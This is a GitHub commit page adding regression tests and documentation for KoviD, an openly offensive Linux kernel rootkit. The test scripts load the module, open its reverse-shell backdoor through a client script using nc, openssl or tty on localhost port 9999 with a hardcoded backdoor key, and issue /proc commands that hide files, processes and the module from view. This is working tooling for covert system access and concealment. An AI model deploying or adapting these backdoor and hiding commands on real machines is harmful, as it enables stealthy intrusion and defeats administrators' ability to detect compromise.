Skip to content

Commit

Permalink
Merge pull request #147 from carloslack/regression-tests-v2.1.1
Browse files Browse the repository at this point in the history
Regression tests v2.1.1
  • Loading branch information
carloslack authored Dec 1, 2024
2 parents 1f76e72 + e1d319d commit 6b8493b
Show file tree
Hide file tree
Showing 14 changed files with 179 additions and 15 deletions.
7 changes: 7 additions & 0 deletions Makefile
Original file line number Diff line number Diff line change
Expand Up @@ -11,8 +11,15 @@ AS=$(shell which as)
CTAGS=$(shell which ctags)
JOURNALCTL := $(shell which journalctl)
UUIDGEN := $(shell uuidgen)

# For tests, use hardcoded keys.
ifndef TEST_ENV
BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
else
BDKEY=0x7d3b1cb572f16425
UNHIDEKEY=0x2
endif

# PROCNAME, /proc/<name> interface.
COMPILER_OPTIONS := -Wall -DPROCNAME='"$(PROCNAME)"' \
Expand Down
13 changes: 9 additions & 4 deletions docs/TestFeatures.md
Original file line number Diff line number Diff line change
Expand Up @@ -39,7 +39,7 @@ $ cmake -DPROCNAME=myproc -DMODNAME=mymodule ../
If you want to build and run native tests only, just use:

```
$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname"
$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1
```

## Building for Linux version other than native
Expand Down Expand Up @@ -109,9 +109,10 @@ $ make
To simply run those (but make sure you followed the instructions for setting the enviroment described below):

```
$ cd KoviD && make PROCNAME="myprocname" TEST_ENV=1
# From root directory of the project
$ mkdir build && cd build
$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname"
$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1
# Please run the command with only one Thread!
$ make check-kovid -j1
```
Expand Down Expand Up @@ -187,7 +188,7 @@ Usual set of commands to be used:
$ git clone https://github.com/carloslack/KoviD.git main-KoviD && cd main-KoviD
$ git submodule update --init test/test-artefacts
$ mkdir build && cd build
$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" && make check-kovid
$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 && make check-kovid
```

## Insall dependecies and set up enviroment
Expand Down Expand Up @@ -269,7 +270,7 @@ Run tests in `DEPLOY` mode (some tests are run in this mode only; this is exampl

```
$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=projects/private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCROSS_TESTS=ON -DCMAKE_C_COMPILER=gcc -DDEPLOY=1
$ make PROCNAME="myprocname" DEPLOY=1
$ make PROCNAME="myprocname" DEPLOY=1 TEST_ENV=1
$ make check-kovid
```

Expand Down Expand Up @@ -306,3 +307,7 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co
| tty backdoor | Yes | native/tty-backdoor.test |
| backdoor echo -s | Yes | native/nc-backdoor-echo-s.test |
| Hide/Unhide Module | Yes | native/hide-unhide-module.test |
| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test |
| hide file | Yes | native/hiden-file.test |
| hide file (2) | Yes | native/hiden-file-in-all-dirs.test |
| unhide module | Yes | native/hide-unhide-module.test |
7 changes: 7 additions & 0 deletions test/native/Inputs/Makefile
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
obj-m = hello.o

all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
make --C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
24 changes: 24 additions & 0 deletions test/native/Inputs/hello.c
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>

MODULE_LICENSE("GPL");

MODULE_DESCRIPTION("A simple Hello world LKM!");

MODULE_VERSION("0.1");

static int __init hello_start(void)
{
printk(KERN_INFO "Loading hello module...\n");
printk(KERN_INFO "Hello world\n");
return 0;
}

static void __exit hello_end(void)
{
printk(KERN_INFO "Goodbye!!!\n");
}

module_init(hello_start);
module_exit(hello_end);
6 changes: 6 additions & 0 deletions test/native/Inputs/simple-test.c
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
int main()
{
while(1);

return 0;
}
5 changes: 3 additions & 2 deletions test/native/hide-unhide-module.test
Original file line number Diff line number Diff line change
@@ -1,4 +1,3 @@
# REQUIRES: 0
# REQUIRES: DEBUG_ONLY
# REQUIRES: NATIVE_TESTS

Expand All @@ -8,8 +7,10 @@
sleep 10
sudo insmod ../../../build/kovid.ko
lsmod | grep kovid
echo -h > /proc/myprocname
kill -CONT 31337
echo hide-lkm > /proc/myprocname
lsmod | grep kovid
echo unhide-lkm=2 > /proc/myprocname
sudo rmmod kovid

# CHECK: kovid
Expand Down
30 changes: 30 additions & 0 deletions test/native/hiden-file-in-all-dirs.test
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
# REQUIRES: 0
# REQUIRES: DEBUG_ONLY
# REQUIRES: NATIVE_TESTS

# RUN: bash %s > %t.log
# RUN: FileCheck-18 --input-file=%t.log %s

sudo insmod ../../../build/kovid.ko
kill -CONT 31337

TEST_FILE="hidden_file.txt"

# Create a file with the same name in another directory
OTHER_DIR="/tmp/other_dir"
mkdir -p "$OTHER_DIR"
touch "$OTHER_DIR/$TEST_FILE"

# Hide the file using the backdoor
echo hide-file-anywhere="$TEST_FILE" > /proc/myprocname

# Check that files with the same name in other directories are also hidden
ls "$OTHER_DIR" | grep "$TEST_FILE" || echo "File is hidden in other directory"

# Cleanup
rm -rf "$OTHER_DIR"

# Remove the kernel module
sudo rmmod kovid

# CHECK: File is hidden in other directory
29 changes: 29 additions & 0 deletions test/native/hiden-file.test
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
# REQUIRES: 0
# REQUIRES: DEBUG_ONLY
# REQUIRES: NATIVE_TESTS

# RUN: bash %s > %t.log
# RUN: FileCheck-18 --input-file=%t.log %s

sudo insmod ../../../build/kovid.ko
kill -CONT 31337

# Create a test directory and file
TEST_DIR="/tmp/test_hide_file"
TEST_FILE="hidden_file.txt"
mkdir -p "$TEST_DIR"
touch "$TEST_DIR/$TEST_FILE"

# Hide the file using the backdoor
echo hide-file="$TEST_DIR/$TEST_FILE" > /proc/myprocname

# Verify that the file is hidden when listing the directory
ls "$TEST_DIR" | grep "$TEST_FILE" || echo "File is hidden"

# Cleanup
rm -rf "$TEST_DIR"

# Remove the kernel module
sudo rmmod kovid

# CHECK: File is hidden
12 changes: 6 additions & 6 deletions test/native/nc-backdoor-echo-s.test
Original file line number Diff line number Diff line change
Expand Up @@ -8,18 +8,18 @@
sudo dmesg -c
sleep 10
sudo insmod ../../../build/kovid.ko
sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999
echo -s > /proc/myprocname
sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425
echo list-hidden-tasks > /proc/myprocname
sudo rmmod kovid
sudo dmesg

# CHECK: kv: using kprobe for kallsyms_lookup_name
# CHECK: Waiting for event
# CHECK: loaded
# CHECK: Got event
# CHECK: hide [{{.*}}] {{.*}}
# CHECK: hide [{{.*}}] {{.*}}
# CHECK: BD : dash
# CHECK: BD : bash
# CHECK: hide: {{.*}}
# CHECK: hide: {{.*}}
# CHECK: hide: {{.*}}
# CHECK: hide: {{.*}}
# CHECK: Got event
# CHECK: unloaded
36 changes: 36 additions & 0 deletions test/native/nc-backdoor-plus-pid.test
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
# REQUIRES: 0
# REQUIRES: DEBUG_ONLY
# REQUIRES: NATIVE_TESTS

# RUN: bash %s > %t.log
# RUN: FileCheck-18 --input-file=%t.log %s

sudo insmod ../../../build/kovid.ko

# Start the reverse shell in the background, suppressing its output
sudo timeout 20 ../../../scripts/bdclient.sh nc localhost 9999 > /dev/null 2>&1 &

# Allow the reverse shell to initialize
sleep 1

# Send a signal to the "kill -CONT 31337" process as an additional check
kill -CONT 31337 || echo "sh: can't kill pid 31337: No such process"

# Run the `a.out` executable in the background and capture its PID
./Inputs/a.out &
AOUT_PID=$!

# Wait briefly to ensure the process has started
sleep 1

# Hide the process using the backdoor functionality
echo hide-task-backdoor=$AOUT_PID > /proc/myprocname

# Attempt to kill the hidden process and verify that it fails
kill -9 "$AOUT_PID" || echo "sh: can't kill pid $AOUT_PID: No such process"

# Remove the module
sudo rmmod kovid

# CHECK: sh: can't kill pid 31337: No such process
# CHECK: sh: can't kill pid {{.*}}: No such process
3 changes: 2 additions & 1 deletion test/native/nc-backdoor.test
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@
# REQUIRES: 0
# REQUIRES: DEBUG_ONLY
# REQUIRES: NATIVE_TESTS

Expand All @@ -7,7 +8,7 @@
sudo dmesg -c
sleep 10
sudo insmod ../../../build/kovid.ko
sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999
sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425
sudo rmmod kovid
sudo dmesg

Expand Down
2 changes: 1 addition & 1 deletion test/native/openssl-backdoor.test
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@
# RUN: FileCheck-18 --input-file=%t.log %s

sudo insmod ../../../build/kovid.ko
sudo timeout 10 ../../../scripts/bdclient.sh openssl localhost 9999
sudo timeout 10 ../../../scripts/bdclient.sh openssl localhost 9999 0x7d3b1cb572f16425
sudo rmmod kovid

# CHECK: ACCEPT
Expand Down
18 changes: 18 additions & 0 deletions test/native/simple-insmod-hello-ko.test
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
# REQUIRES: 0
# REQUIRES: DEBUG_ONLY
# REQUIRES: NATIVE_TESTS

## Make sure you enter `test/native/Inputs` and run `make`
## in order to build `hello.ko`.

# RUN: bash %s > %t.log
# RUN: FileCheck-18 --input-file=%t.log %s

sudo dmesg -c
sleep 2
sudo insmod ../../../test/native/Inputs/hello.ko
sudo rmmod hello
sudo dmesg

# CHECK: Loading hello module...
# CHECK: Hello world
2 changes: 1 addition & 1 deletion test/native/tty-backdoor.test
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,7 @@
sudo dmesg -c
sleep 20
sudo insmod ../../../build/kovid.ko
sudo timeout 10 ../../../scripts/bdclient.sh tty localhost 9999
sudo timeout 10 ../../../scripts/bdclient.sh tty localhost 9999 0x7d3b1cb572f16425
sudo rmmod kovid
sudo dmesg

Expand Down

0 comments on commit 6b8493b

Please sign in to comment.